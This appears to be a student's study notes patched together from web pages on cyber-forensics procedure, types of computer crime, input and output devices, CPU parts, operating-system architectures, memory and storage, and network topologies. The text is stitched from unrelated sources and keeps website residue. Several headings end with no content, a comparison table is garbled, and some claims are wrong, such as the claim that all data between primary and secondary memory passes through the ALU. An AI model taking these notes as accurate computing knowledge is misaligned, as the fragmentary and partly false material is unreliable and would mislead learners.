Professional Documents
Culture Documents
Legal Aspects
Legal Aspects
1
Unit I
PROCEDURE:
The procedure starts with identifying the devices used and collecting the
preliminary evidence on the crime scene. Then the court warrant is obtained for
the seizure of the evidence which leads to the seizure of the evidence. The
evidence are then transported to the forensics lab for further investigations
and the procedure of transportation of the evidence from the crime scene to
labs are called chain of custody. The evidence are then copied for analysis and
the original evidence is kept safe because analysis are always done on the
copied evidence and not the original evidence.
The analysis is then done on the copied evidence for suspicious activities and
accordingly, the findings are documented in a nontechnical tone. The
documented findings are then presented in a court of law for further
investigations.
Some Tools used for Investigation:
Tools for Laptop or PC –
COFFEE – A suite of tools for Windows developed by Microsoft.
The Coroner’s Toolkit – A suite of programs for Unix analysis.
The Sleuth Kit – A library of tools for both Unix and Windows.
Tools for Memory :
Volatility
WindowsSCOPE
Tools for Mobile Device :
MicroSystemation XRY/XACT
Identification
Preservation
Analysis
Documentation
Presentation
Identification
It is the first step in the forensic process. The identification
process mainly includes things like what evidence is present,
where it is stored, and lastly, how it is stored (in which format).
Electronic storage media can be personal computers, Mobile
phones, PDAs, etc.
Preservation
In this phase, data is isolated, secured, and preserved. It
includes preventing people from using the digital device so that
digital evidence is not tampered with.
Analysis
In this step, investigation agents reconstruct fragments of data
and draw conclusions based on evidence found. However, it
might take numerous iterations of examination to support a
specific crime theory.
Documentation
In this process, a record of all the visible data must be created. It
helps in recreating the crime scene and reviewing it. It Involves
proper documentation of the crime scene along with
photographing, sketching, and crime-scene mapping.
Presentation
In this last step, the process of summarization and explanation of
conclusions is done.
However, it should be written in a layperson’s terms using
abstracted terminologies. All abstracted terminologies should
reference the specific details.
F COMPUTER CRIMES
Home > Blog > Common Types of Computer Crimes
The growth and advances in digital technology creates a whole new platform for
criminal activity. Since the advancement of technology, any crime that involves
using a computer or network is generally referred to as a cybercrime or computer
crime. The penalties differ for each crime, depending on whether they violated
state or federal laws. In general, they include fines, imprisonment, probation, or
all the above.
Hacking
The computer crime hacking refers to the practice of gaining unauthorized
access to another person’s computer, database, or network where private
information can be stored. It is a felony in the U.S. to hack a computer system,
whether it is a single personal computer or an organizational computer network.
However, not all types of “hacking” refer to crimes. Some organizations perform
“Ethical hacking” on their own systems or with permission to explore the systems
of others to look for vulnerabilities. This is treated differently than “malicious
hacking,” the act of entering someone’s computer without their knowledge to take
data or leave viruses.
240 Years Of Combined Experience Fighting For Our Clients
START TODAY
Piracy
Piracy is a computer crime that occurs when a person distributes copyrighted
material without gaining permission from the original owner. The shared material
can be different types of media, including music, software, movies, images, and
books. There are many sharing websites that practice internet piracy by offering
free, downloadable versions of products. In many jurisdictions, it is only the
sharing of materials that is illegal, and being in receipt may not be illegal.
However, many peer-to-peer (p2p) systems require users to share material with
others as it is being downloaded, resulting in a form of collaborative piracy. The
charges for piracy differ from case to case, so it is important to contact and
attorney to assure that you are correctly informed about the laws regarding your
specific situation.
Cyber Stalking/Harassment
The victim of cyber stalking is subjected to an excessive number of online
messages, whether through social media, web forums, or email. It is common for
the perpetrator to have real world contact with the victim but use the internet to
stalk them instead of stalking them in the physical sense. It could progress into
traditional stalking if the perpetrator feels they need to make more of an impact
on their victim’s lives.
Identity theft
Identity theft in the world of computer crimes involves a form of hacking where
the perpetrator accesses the victim’s sensitive information such as their Social
Security Number (SSN), bank account information, or credit card numbers. They
then use this information to spend their victim’s money for online shopping or
simply to steal the money through fraudulent transfers.
Child Pornography/Abuse
This cybercrime can involve the perpetrator looking to create or distribute sexual
images of children. In some cases, the accused seeks out minors on the internet,
whether that be via social media or chatrooms with the objective of producing
child pornography. The government monitors a large amount of chat rooms in
hopes to reduce and prevent this type of exploitation, and also maintains
databases of existing child pornographic content that may be shared. Convictions
for these charges typically mean long prison sentences. It is important to contact
an attorney in the case of any accusations of these crimes because the
punishments are so severe.
unit 2
Keyboard
The keyboard is the most frequent and widely used input device for entering
data into a computer. Although there are some additional keys for performing
other operations, the keyboard layout is similar to that of a typical typewriter.
Generally, keyboards come in two sizes: 84 keys or 101/102 keys but currently
keyboards with 104 keys or 108 keys are also available for Windows and the
Internet.
Keyboard
Types of Keys
Numeric Keys: It is used to enter numeric data or move the cursor. It
usually consists of a set of 17 keys.
Typing Keys: The letter keys (A-Z) and number keys (09) are among these
keys.
Control Keys: These keys control the pointer and the screen. There are four
directional arrow keys on it. Home, End, Insert, Alternate(Alt), Delete,
Control(Ctrl), etc., and Escape are all control keys (Esc).
Special Keys: Enter, Shift, Caps Lock, NumLk, Tab, etc., and Print Screen
are among the special function keys on the keyboard.
Function Keys: The 12 keys from F1 to F12 are on the topmost row of the
keyboard.
Mouse
The most common pointing device is the mouse. The mouse is used to move a
little cursor across the screen while clicking and dragging. The cursor will stop if
you let go of the mouse. The computer is dependent on you to move the
mouse; it won’t move by itself. As a result, it’s an input device.
A mouse is an input device that lets you move the mouse on a flat surface to
control the coordinates and movement of the on-screen cursor/pointer.
The left mouse button can be used to select or move items, while the right
mouse button when clicked displays extra menus.
Mouse
Joystick
Joystick
The joystick’s function is comparable to that of a mouse. It is primarily used in
CAD (Computer-Aided Design) and playing video games on the computer.
Track Ball
Track Ball is an accessory for notebooks and laptops, which works on behalf of
a mouse. It has a similar structure to a mouse. Its structure is like a half-
inserted ball and we use fingers for cursor movement. Different shapes are
used for this like balls, buttons, or squares.
Light Pen
A light pen is a type of pointing device that looks like a pen. It can be used to
select a menu item or to draw on the monitor screen. A photocell and an optical
system are enclosed in a tiny tube. When the tip of a light pen is moved across
a monitor screen while the pen button is pushed, the photocell sensor element
identifies the screen location and provides a signal to the CPU.
Light Pen
Scanner
A scanner is an input device that functions similarly to a photocopier. It’s
employed when there’s information on paper that needs to be transferred to the
computer’s hard disc for subsequent manipulation. The scanner collects images
from the source and converts them to a digital format that may be saved on a
disc. Before they are printed, these images can be modified.
Scanner
It is a device that is generally used in banks to deal with the cheques given to
the bank by the customer. It helps in reading the magnetic ink present in the
code number and cheque number. This process is very fast compared to any
other process.
Bar Code Reader
A bar code reader is a device that reads data that is bar-coded (data that is
represented by light and dark lines).Bar-coded data is commonly used to mark
things, number books, and so on. It could be a handheld scanner or part of a
stationary scanner. A bar code reader scans a bar code image, converts it to an
alphanumeric value, and then sends it to the computer to which it is connected.
Bar Code Reader
Web Camera
Because a web camera records a video image of the scene in front of it, a
webcam is an input device. It is either built inside the computer (for example, a
laptop) or attached through a USB connection. A webcam is a computer-
connected tiny digital video camera. It’s also known as a web camera because
it can take images and record video. These cameras come with software that
must be installed on the computer in order to broadcast video in real-time over
the Internet. It can shoot images and HD videos, however, the video quality isn’t
as good as other cameras (In Mobiles or other devices or normal cameras).
Web Camera
Digitizer
Microphone
The microphone works as an input device that receives input voice signals and
also has the responsibility of converting it also to digital form. It is a very
common device that is present in every device which is related to music.
Output Devices
Output Devices are the devices that show us the result after giving the input to
a computer system. Output can be of many different forms like image, graphic
audio, video, etc. Some of the output devices are described below.
Monitor
Monitors, also known as Visual Display Units (VDUs) , are a computer’s primary
output device. It creates images by arranging small dots, known as pixels, in a
rectangular pattern. The amount of pixels determines the image’s sharpness.
The two kinds of viewing screens used for monitors are described below.
Cathode-Ray Tube (CRT) Monitor: Pixels are minuscule visual elements
that make up a CRT display. The higher the image quality or resolution, the
smaller the pixels.
Flat-Panel Display Monitor: In comparison to the CRT, a flat-panel
display is a type of video display with less volume, weight, and power
consumption. They can be hung on the wall or worn on the wrist.
Flat-panel displays are currently used in calculators, video games, monitors,
laptop computers, and graphical displays.
Monitor
Television
Television is one of the common output devices which is present in each and
every house. It portrays video and audio files on the screen as the user handles
the television. Nowadays, we are using plasma displays as compared to CRT
screens which we used earlier.
Printer
Printers are output devices that allow you to print information on paper. There
are certain types of printers which are described below.
Impact Printers
Character Printers
Line Printers
Non-Impact Printers
Laser Printers
Inkjet Printers
Printer
Impact Printer
Characters are printed on the ribbon, which is subsequently crushed against the
paper, in impact printers. The following are the characteristics of impact
printers:
Exceptionally low consumable cost.
Quite noisy
Because of its low cost, it is ideal for large-scale printing.
To create an image, there is physical contact with the paper.
Character Printers
Character Printer has the capability to print only one character at a time. It is of
two types.
Dot Matrix Printer
Daisy Wheel
Line Printers
Line Printers are printers that have the capability to print one line at a time. It is
of two types.
Drum Printer
Chain Printer
Non-Impact Printers
Characters are printed without the need for a ribbon in non-impact printers.
Because these printers print a full page at a time, they’re also known as Page
Printers. The following are the characteristics of non-impact printers:
Faster
They don’t make a lot of noise.
Excellent quality
Supports a variety of typefaces and character sizes
Laser Printers
Laser Printers use laser lights for producing dots which will produce characters
on the page.
Inkjet Printers
Inkjet printers are printers that use spray technology for printing papers. High-
quality papers are produced in an Inkjet printer. They also do color printing.
Speakers
Speakers are devices that produce sound after getting a command from a
computer. Nowadays, speakers come with wireless technology also like
Bluetooth speakers.
Projector
Projectors are optical devices that have the work to show visuals on both types
of screens, stationary and moving both. It helps in displaying images on a big
screen. Projectors are generally used in theatres, auditoriums, etc.
Plotter
Plotter is a device that helps in making graphics or other images to give a real
view. A graphic card is mandatorily required to use these devices. These are
the pen-like devices that help in generating exact designs on the computer.
Braille Reader
Braille Reader is a very important device that is used by blind users. It helps
people with low vision or no vision to recognize the data by running their fingers
over the device to understand easily. It is a very important device for blind
persons as it gives them the comfort to understand the letters, alphabets, etc
which helps them in study.
Video Card
A video Card is a device that is fitted into the motherboard of the computer. It
helps in improvising digital content in output devices. It is an important tool that
helps people in using multiple devices.
Headphones
Headphones are just like a speaker, which is generally used by a single person
or it is a single-person usable device and is not commonly used in large areas.
These are also called headsets having a lower sound frequency.
Both the Input and Output Devices of the Computer
There are so many devices that contain the characteristics of both input and
output. They can perform both operations as they receive data and provide
results. Some of them are mentioned below.
USB Drive
USB Drive is one of the devices which perform both input and output operations
as a USB Drive helps in receiving data from a device and sending it to other
devices.
Modem
Modems are one of the important devices that helps in transmitting data using
telephonic lines.
CD and DVD
CD and DVD are the most common device that helps in saving data from one
computer in a particular format and send data to other devices which works as
an input device to the computer.
Headset
Facsimile
A facsimile is a fax machine that consists of a scanner and printer, where the
scanner works as an input device and the printer works as an output device.
b)discuss CPU
the CPU is responsible for all the major tasks like processing data and
instructions inside the computer system. But, all this is possible only because of
the components present inside the CPU which divide the work among
themselves and process it at a fast pace to produce the desired result. We will
study each of these components in the subsequent parts.
The control unit controls the way input and output devices, the Arithmetic, and Logic Unit, and the
computer’s memory respond to the instruction sent to the CPU. It fetches the input, converts it in a
decoded form, and then sends it for processing to the computer’s processor, where the desired
operation is performed. There are two types of Control units – the Hardwire CU and the
Microprogrammable CU.
It controls the sequence in which instructions move in and out of the processor and also the
way the instructions are performed.
It is responsible for fetching the input, converting it into signals, and
storing it for further processing.
2. Arithmetic Logic Unit (ALU)
The Arithmetic and Logical Unit is responsible for arithmetical and logical calculations as well as
taking decisions in the system. It is also known as the mathematical brain of the computer. The ALU
makes use of registers for the calculations. It takes input from input registers, performs operations on
the data, and stores the output in an output register.
Functions of ALU:
It is mainly used to make decisions like performing arithmetic and logical operations.
It acts as a bridge between the computer’s primary memory and the secondary memory. All
information that is exchanged between the primary and secondary memory passes through
the ALU.
3. Registers
Registers are part of a computer’s memory that is used to store the instructions temporarily to
provide the processor with the instructions at times of need. These registers are also known as
Processor registers as they play an important role in the processing of data. These registers store data
in the form of memory address and after the processing of the instruction present at that memory
address is completed, it stores the memory address of the next instruction. There are various kinds of
registers that perform different functions.
Functions of Registers:
The cache is a type of Random Access Memory that stores small amounts of data and instructions
temporarily which can be reused as and when required. It reduces the amount of time needed to fetch
the instructions as instead of fetching it from the RAM, it can be directly accessed from Cache in a
small amount of time.
Functions of Cache:
They reduce the amount of time needed to fetch and execute instructions.
They store data temporarily for later use.
5. Buses
A bus is a link between the different components of the computer system and the processor. They are
used to send signals and data from the processor to different devices and vice versa. There are three
types of buses – Address bus which is used to send memory address from process to other
components. The data bus, which is used to send actual data from the processor to the components,
and the Control bus, used to send control signals from the processor to other devices.
Functions of Bus:
As the name suggests, the clock controls the timing and speed of the functions of different
components of the CPU. It sends out electrical signals which regulate the timing and speed of the
functions.
Functions of Clock:
Digital media
35 languages
Article
Talk
Read
Edit
View history
Tools
From Wikipedia, the free encyclopedia
Hard drives store information in binary form and so are considered a type of physical digital media.
Examples[edit]
Examples of digital media include software, digital images, digital video, video
games, web pages and websites, social media, digital data and databases, digital
audio such as MP3, electronic documents and electronic books. Digital media often
contrasts with print media, such as printed books, newspapers and magazines, and
other traditional or analog media, such as photographic film, audio tapes or video tapes.
Digital media has had a significantly broad and complex impact on society and culture.
Combined with the Internet and personal computing, digital media has
caused disruptive innovation in publishing, journalism, public relations, entertainment,
education, commerce and politics. Digital media has also posed new challenges
to copyright and intellectual property laws, fostering an open content movement in
which content creators voluntarily give up some or all of their legal rights to their work.
The ubiquity of digital media and its effects on society suggest that we are at the start of
a new era in industrial history, called the Information Age, perhaps leading to
a paperless society in which all media are produced and consumed on computers.
[5]
However, challenges to a digital transition remain, including outdated copyright
laws, censorship, the digital divide, and the spectre of a digital dark age, in which older
media becomes inaccessible to new or upgraded information systems.[6] Digital media
has a significant, wide-ranging and complex impact on society and culture.[5]
1. System Software:
System software is a type of computer program that is designed to run a
computer’s hardware and application programs it controls a computer’s internal
functioning, chiefly through an operating system. It also controls peripherals
devices such as monitors, printers, and storage devices.
2. Operating System:
An operating system or OS is system software that manages computer
hardware, and software resources, and provides common services for computer
programs. All operating systems are system software. Every desktop computer,
tablet, and smartphone includes an operating system that provides basic
functionality for the device.
Difference between System Software and Operating System :
S.
No. System Software Operating System
It loads in the main memory It resides in the main memory all the time
5. whenever required. while the system is on.
It is loaded by the operating It resides in the main memory all the time
6. system. while the system is on.
Go to Challenge
Overview
The operating system provides an environment for the users to execute computer programs.
Operating systems are already installed on the computers you buy for eg personal computers
have windows, Linux, and macOS, mainframe computers have z/OS, z/VM, etc, and mobile
phones have operating systems such as Android, and iOS. The architecture of an operating
system consists of four major components hardware, kernel, shell, and application and we shall
explore all of them in detail one by one.
Scope
In this article we'll learn how Operating system acts as an intermediary for the users
We'll go through the Components of the operating system including process
management, memory management, security, error detection, and I/O management.
We'll also learn about the four architectures of operating systems monolithic, layered,
microkernel, and hybrid.
We'll learn that how the Hybrid architecture of operating systems includes all of the previously
mentioned operating systems.
Highlights:
The operating system handles all of the above tasks for the system as well as application
software. The architecture of an operating system is basically the design of its software and
hardware components. Depending upon the tasks or programs we need to run users can use the
operating system most suitable for that program/software.
Before explaining various architectures of the operating systems, let's explore a few terms first
which are part of the operating system.
1) Application: The application represents the software that a user is running on an operating
system it can be either system or application software eg slack, sublime text editor, etc.
2) Shell: The shell represents software that provides an interface for the user where it serves to
launch or start some program for which the user gives instructions.
It can be of two types first is a command line and another is a graphical user interface for
eg: MS-DOS Shell, PowerShell, csh, ksh, etc.
3) Kernel: Kernel represents the most central and crucial part of the operating system where it is
used for resource management i.e. it provides necessary I/O, processor, and memory to the
application processes through inter-process communication mechanisms and system calls. Let's
understand the various types of architectures of the operating system.
Highlights:
Architectures of operating systems can be of four types monolithic, layered, microkernel, and
hybrid.
Hybrid architecture is the combination of all architectures. There are major four types of
architectures of operating systems.
1) Monolithic Architecture
In monolithic architecture, each component of the operating system is contained in the kernel i.e.
it is working in kernel space, and the components of the operating system communicate with
each other using function
calls.
Examples of this type of architecture are OS/360, VMX, and LINUX.
Advantages:
1. The main advantage of having a monolithic architecture of the operating system is that it
provides CPU scheduling, memory management, memory management, etc through system
calls.
2. In a single address space, the entire large process is running.
3. It is a single static binary file.
Disadvantages:
1. The main disadvantage is that all components are interdependent and when one of them fails
the entire system fails.
2. In case the user has to add a new service or functionality the entire operating system needs to
be changed.
2) Layered architecture
In Layered architecture, components with similar functionalities are grouped to form a layer and
in this way, total n+1 layers are constructed and counted from 0 to n where each layer has a
different set of functionalities and services. Example: THE operating system, also windows XP,
and LINUX implements some level of layering.
1. Each layer can communicate with all of its lower layers but not with its upper layer i.e.
any ith layer can communicate with all layers from 0 to i-1 but not with the i+1th layer.
2. Each layer is designed in such a way that it will only need the functionalities which are present in
itself or the layers below it.
2) CPU scheduling: This layer is responsible for process scheduling, multiple queues are used
for scheduling. Process entering the system are kept in the job queue while those which are ready
to be executed are put into the ready queue. It manages the processes which are to be kept in the
CPU and those which are to be kept out of the CPU.
3) Memory Management: This layer handles the aspect of memory management i.e. moving
the processes from the secondary to primary memory for execution and vice-versa. There are
memories like RAM, and ROM. RAM is the memory where our processes run they are moved to
the RAM for execution and when they exit they are removed from RAM.
4) Process Management: This layer is responsible for managing the various processes i.e.
assigning the CPU to those processes on a priority basis for their execution. Process management
uses many scheduling algorithms for prioritizing the processes for execution such as the Round-
Robin algorithm, FCFS(First Come First Serve), SJF(Shortest Job First), etc.
5) I/O Buffer: Buffering is the temporary storage of data and I/O Buffer means that the data
input is first buffered before storing it in the secondary memory. All I/O devices have buffers
attached to them for the temporary storage of the input data because it cannot be stored directly
in the secondary storage as the speed of the I/O devices is slow as compared to the processor.
6) User Programs: This is the application layer of the layered architecture of the operating
system, it deals with all the application programs running eg games, browsers, words, etc. It is
the highest layer of layered architecture.
Advantages:
1) Layered architecture of the operating system provides modularity because each layer is
programmed to perform its own tasks only. 2) Since the layered architecture has independent
components changing or updating one of them will not affect the other component or the
entire operating system will not stop working, hence it is easy to debug and update. 3) The user
can access the services of the hardware layer but cannot access the hardware layer itself because
it is the innermost layer. 4) Each layer has its own functionalities and it is concerned with itself
only and other layers are abstracted from it.
Disadvantages:
1. Layered architecture is complex in implementation because one layer may use the services of
the other layer and therefore, the layer using the services of another layer must be put below
the other one.
2. In a layered architecture, if one layer wants to communicate with another it has to send a
request which goes through all layers in between which increases response time causing
inefficiency in the system.
3) Microkernel Architecture
In this architecture, the components like process management, networking, file system
interaction, and device management are executed outside the kernel while memory management
and synchronization are executed inside the kernel. The processes inside the kernel have
relatively high priority, the components possess high modularity hence even if one or more
components fail the operating system keeps on working.
Advantages:
1. Microkernel operating systems are modular and hence, disturbing one of the components will
not affect the other component.
2. The architecture is compact and isolated and hence relatively efficient.
3. New features can be added without recompilation.
Disadvantages:
4) Hybrid Architecture
Hybrid architecture as the name suggests consists of a hybrid of all the architectures explained so
far and hence it has properties of all of those architectures which makes it highly useful in
present-day operating systems.
1) Hardware abstraction layer: It is the interface between the kernel and hardware and is
present at the lowest level.
2) Microkernel Layer: This is the old microkernel that we know and it consists of CPU
scheduling, memory management, and inter-process communication.
3) Application Layer: It acts as an interface between the user and the microkernel. It contains
the functionalities like a file server, error detection, I/O device management, etc.
Example: Microsoft Windows NT kernel implements hybrid architecture of the operating
system.
Advantages:
1. Since it is a hybrid of other architectures it allows various architectures to provide their services
respectively.
2. It is easy to manage because it uses a layered approach.
3. Number of layers is relatively lesser.
4. Security and protection are relatively improved.
Disadvantage:
1)Hybrid architecture of the operating system keeps certain services in the kernel space while
moving less critical services to the user space.
Conclusion
We conclude that the operating system has various architectures with which we can describe
the functionality of various components.
The components of the operating system are process management, memory management, I/O
management, Error Detection, and controlling peripheral devices.
These architectures include monolithic, layered, microkernel, and hybrid architectures classified
on the basis of the structure of components.
Hybrid architecture is the most efficient and useful architecture as it implements the
functionalities of all other architectures.
Hybrid architecture is better in terms of security as well.
The hybrid architecture of operating systems as we know is a hybrid of other architectures like
monolithic, layered, and microkernel architectures of operating systems so it has the
functionalities of all of them. Since, we can see that hybrid architecture contains all the
functionalities of monolithic, layered, and microkernel architecture, therefore it is better than all
of them.
2) What are the Key Differences Between Monolithic and Layered Architecture
of Operating Systems?
The key differences between the monolithic and layered architecture of the operating system are:
1. In the monolithic operating system the entire operating system functionalities operate in the
kernel space while in layered architecture there are several layers where each layer has a
specific set of functionalities.
2. In the monolithic operating system there are mainly three layers while in a layered the number
of layers is multiple.
task.
For more, refer to Difference Between System Software and Application Software
FAQs on Application Software
Answer:
Apps can be used generally for mobile devices whereas Applications can be termed as a
software program for doing a preferred task.
Answer:
System Software has the capability to run on its own whereas Application Software is
software that is dependent on the System Software.
For more, refer to the Difference Between System Software and Application Software.
Answer:
The best Application Software can be chosen based on the user’s requirements. if it fulfils
your requirements, then it is perfect for you.
Answer:
On-Premise is basically a data server inside the organization whereas Hosted
Application manages to data externally.
4.discuss
Volatile Memory: This loses its data, when power is switched off.
Memory Hierarchy
The total memory capacity of a computer can be visualized by
hierarchy of components. The memory hierarchy system consists of all
storage devices contained in a computer system from the slow
Auxiliary Memory to fast Main Memory and to smaller Cache memory.
Main Memory
The memory unit that communicates directly within the CPU, Auxillary
memory and Cache memory, is called main memory. It is the central
storage unit of the computer system. It is a large and fast memory
used to store data during computer operations. Main memory is made
up of RAM and ROM, with RAM integrated circuit chips holing the
major share.
Auxiliary Memory
Devices that provide backup storage are called auxiliary memory. For
example: Magnetic disks and tapes are commonly used auxiliary
devices. Other devices used as auxiliary memory are magnetic drums,
magnetic bubble memory and optical disks.
Cache Memory
The data or contents of the main memory that are used again and
again by CPU, are stored in the cache memory so that we can easily
access that data in shorter time.
Whenever the CPU needs to access memory, it first checks the cache
memory. If the data is not found in cache memory then the CPU
moves onto the main memory. It also transfers block of recent data
into the cache and keeps on deleting the old data in cache to
accomodate the new one.
Hit Ratio
The ratio of the number of hits to the total CPU references to memory
is called hit ratio.
Hit Ratio = Hit/(Hit + Miss)
Associative Memory
The ubiquity of data formats, record types and volumes has served as the
springboard for different approaches to storing it. From personal data storage
devices to limitless data center and cloud-based data repositories, you now
have many options to organize and store your corporate data.
Direct-attached storage stands for all types of physical data storage devices
you can connect to a computer. Portable and affordable — yet only accessible
by one computer at a time — DAS is a standard solution for keeping small-
scale records data backups or for transferring data between devices.
Storage area networks (SANs) help assemble an even more complex on-
premises data management architecture that features two components:
A dedicated network for data exchanges with network switches for load
balancing
Data storage system, consisting of on-premises hardware
The purpose of SAN is to act as a separate "highway" for transmitting data
between servers and storage devices across the organization, in a bypass of
local area networks (LANs) and wide-area networks (WANs). Featuring a
management layer, SANs can be configured to speed up and strengthen
server-to-server, storage-to-server and storage-to-storage connections.
For instance, you can set up a dedicated low-latency data exchange lane
between a server running big data analytics workloads and a storage system
(i.e., data warehouse) hosting the processed data. Doing so helps prevent
bottlenecks and delays for other users on the LANs/WANs. The type of data
storage that makes use of a dedicated SANs is typically defined as "block
storage."
Unlike other options, cloud data storage assumes you will (primarily) use
offsite storage of data in public, private, hybrid or multicloud environments that
are managed and maintained by cloud services providers such as Amazon,
Microsoft and Google, among others.
Unlike NAS or SAN, public cloud data storage doesn't require a separate
internal network — all data is accessible via the internet. Also, there are
virtually no limits on scalability since you are renting storage resources from a
third party that effectively offers an endless supply of servers.
But while cloud data storage assumes only operational expenses (OpEx),
these too can add up without proper monitoring and optimization.
As with all the data storage options available, this approach works perfectly in
some applications and presents drawbacks in others.
5. Network
a) discuss topology
Discuss
In Computer Network ,there are various ways through which different components are
connected to one another. Network Topology is the way that defines the structure, and
how these components are connected to each other.
Types of Network Topology
The arrangement of a network that comprises nodes and connecting lines via sender and
receiver is referred to as Network Topology. The various network topologies are:
Point to Point Topology
Mesh Topology
Star Topology
Bus Topology
Ring Topology
Tree Topology
Hybrid Topology
Mesh Topology
In a mesh topology, every device is connected to another device via a particular channel.
In Mesh Topology, the protocols used are AHCP (Ad Hoc Configuration Protocols),
DHCP (Dynamic Host Configuration Protocol), etc.
Mesh Topology
Figure 1: Every device is connected to another via dedicated channels. These channels
are known as links.
Suppose, the N number of devices are connected with each other in a mesh topology,
the total number of ports that are required by each device is N-1. In Figure 1, there are
5 devices connected to each other, hence the total number of ports required by each
device is 4. The total number of ports required = N * (N-1).
Suppose, N number of devices are connected with each other in a mesh topology, then
the total number of dedicated links required to connect them is NC2 i.e. N(N-1)/2. In
Figure 1, there are 5 devices connected to each other, hence the total number of links
required is 5*4/2 = 10.
Advantages of Mesh Topology
Communication is very fast between the nodes.
Mesh Topology is robust.
The fault is diagnosed easily. Data is reliable because data is transferred among the
devices through dedicated channels or links.
Provides security and privacy.
Drawbacks of Mesh Topology
Installation and configuration are difficult.
The cost of cables is high as bulk wiring is required, hence suitable for less number of
devices.
The cost of maintenance is high.
A common example of mesh topology is the internet backbone, where various internet
service providers are connected to each other via dedicated channels. This topology is
also used in military communication systems and aircraft navigation systems.
For more, refer to the Advantages and Disadvantages of Mesh Topology.
Star Topology
In Star Topology, all the devices are connected to a single hub through a cable. This hub
is the central node and all other nodes are connected to the central node. The hub can be
passive in nature i.e., not an intelligent hub such as broadcasting devices, at the same
time the hub can be intelligent known as an active hub. Active hubs have repeaters in
them. Coaxial cables or RJ-45 cables are used to connect the computers. In Star
Topology, many popular Ethernet LAN protocols are used as CD(Collision Detection),
CSMA (Carrier Sense Multiple Access), etc.
Star Topology
Figure 2: A star topology having four systems connected to a single point of connection
i.e. hub.
Advantages of Star Topology
If N devices are connected to each other in a star topology, then the number of cables
required to connect them is N. So, it is easy to set up.
Each device requires only 1 port i.e. to connect to the hub, therefore the total number
of ports required is N.
It is Robust. If one link fails only that link will affect and not other than that.
Easy to fault identification and fault isolation.
Star topology is cost-effective as it uses inexpensive coaxial cable.
Drawbacks of Star Topology
If the concentrator (hub) on which the whole topology relies fails, the whole system
will crash down.
The cost of installation is high.
Performance is based on the single concentrator i.e. hub.
A common example of star topology is a local area network (LAN) in an office where all
computers are connected to a central hub. This topology is also used in wireless networks
where all devices are connected to a wireless access point.
For more, refer to the Advantages and Disadvantages of Star Topology.
Bus Topology
Bus Topology is a network type in which every computer and network device is
connected to a single cable. It is bi-directional. It is a multi-point connection and a non-
robust topology because if the backbone fails the topology crashes. In Bus Topology,
various MAC (Media Access Control) protocols are followed by LAN ethernet
connections like TDMA, Pure Aloha, CDMA, Slotted Aloha, etc.
Bus Topology
Figure 3: A bus topology with shared backbone cable. The nodes are connected to the
channel via drop lines.
Advantages of Bus Topology
If N devices are connected to each other in a bus topology, then the number of cables
required to connect them is 1, known as backbone cable, and N drop lines are
required.
Coaxial or twisted pair cables are mainly used in bus-based networks that support up
to 10 Mbps.
The cost of the cable is less compared to other topologies, but it is used to build small
networks.
Bus topology is familiar technology as installation and troubleshooting techniques are
well known.
CSMA is the most common method for this type of topology.
Drawbacks of Bus Topology
A bus topology is quite simpler, but still, it requires a lot of cabling.
If the common cable fails, then the whole system will crash down.
If the network traffic is heavy, it increases collisions in the network. To avoid this,
various protocols are used in the MAC layer known as Pure Aloha, Slotted Aloha,
CSMA/CD, etc.
Adding new devices to the network would slow down networks.
Security is very low.
A common example of bus topology is the Ethernet LAN, where all devices are
connected to a single coaxial cable or twisted pair cable. This topology is also used in
cable television networks. For more, refer to the Advantages and Disadvantages of Bus
Topology.
Ring Topology
In a Ring Topology, it forms a ring connecting devices with exactly two neighboring
devices. A number of repeaters are used for Ring topology with a large number of nodes,
because if someone wants to send some data to the last node in the ring topology with
100 nodes, then the data will have to pass through 99 nodes to reach the 100th node.
Hence to prevent data loss repeaters are used in the network.
The data flows in one direction, i.e. it is unidirectional, but it can be made bidirectional
by having 2 connections between each Network Node, it is called Dual Ring Topology.
In-Ring Topology, the Token Ring Passing protocol is used by the workstations to
transmit the data.
Ring Topology
Figure 4: A ring topology comprises 4 stations connected with each forming a ring.
The most common access method of ring topology is token passing.
Token passing: It is a network access method in which a token is passed from one
node to another node.
Token: It is a frame that circulates around the network.
Operations of Ring Topology
1. One station is known as a monitor station which takes all the responsibility for
performing the operations.
2. To transmit the data, the station has to hold the token. After the transmission is done,
the token is to be released for other stations to use.
3. When no station is transmitting the data, then the token will circulate in the ring.
4. There are two types of token release techniques: Early token release releases the
token just after transmitting the data and Delayed token release releases the token
after the acknowledgment is received from the receiver.
Advantages of Ring Topology
The data transmission is high-speed.
The possibility of collision is minimum in this type of topology.
Cheap to install and expand.
It is less costly than a star topology.
Drawbacks of Ring Topology
The failure of a single node in the network can cause the entire network to fail.
Troubleshooting is difficult in this topology.
The addition of stations in between or the removal of stations can disturb the whole
topology.
Less secure.
For more, refer to the Advantages and Disadvantages of Ring Topology.
Tree Topology
This topology is the variation of the Star topology. This topology has a hierarchical flow
of data. In Tree Topology, protocols like DHCP and SAC (Standard Automatic
Configuration ) are used.
Tree Topology
Figure 5: In this, the various secondary hubs are connected to the central hub which
contains the repeater. This data flow from top to bottom i.e. from the central hub to the
secondary and then to the devices or from bottom to top i.e. devices to the secondary hub
and then to the central hub. It is a multi-point connection and a non-robust topology
because if the backbone fails the topology crashes.
Advantages of Tree Topology
It allows more devices to be attached to a single central hub thus it decreases the
distance that is traveled by the signal to come to the devices.
It allows the network to get isolated and also prioritize from different computers.
We can add new devices to the existing network.
Error detection and error correction are very easy in a tree topology.
Drawbacks of Tree Topology
If the central hub gets fails the entire system fails.
The cost is high because of the cabling.
If new devices are added, it becomes difficult to reconfigure.
A common example of a tree topology is the hierarchy in a large organization. At the top
of the tree is the CEO, who is connected to the different departments or divisions (child
nodes) of the company. Each department has its own hierarchy, with managers
overseeing different teams (grandchild nodes). The team members (leaf nodes) are at the
bottom of the hierarchy, connected to their respective managers and departments.
For more, refer to the Advantages and Disadvantages of Tree Topology.
Hybrid Topology
This topological technology is the combination of all the various types of topologies we
have studied above. Hybrid Topology is used when the nodes are free to take any form. It
means these can be individuals such as Ring or Star topology or can be a combination of
various types of topologies seen above. Each individual topology uses the protocol that
has been discussed earlier.
Hybrid Topology
Figure 6: The above figure shows the structure of the Hybrid topology. As seen it
contains a combination of all different types of networks.
Advantages of Hybrid Topology
This topology is very flexible.
The size of the network can be easily expanded by adding new devices.
Drawbacks of Hybrid Topology
It is challenging to design the architecture of the Hybrid Network.
Hubs used in this topology are very expensive.
The infrastructure cost is very high as a hybrid network requires a lot of cabling and
network devices.
A common example of a hybrid topology is a university campus network. The network
may have a backbone of a star topology, with each building connected to the backbone
through a switch or router. Within each building, there may be a bus or ring topology
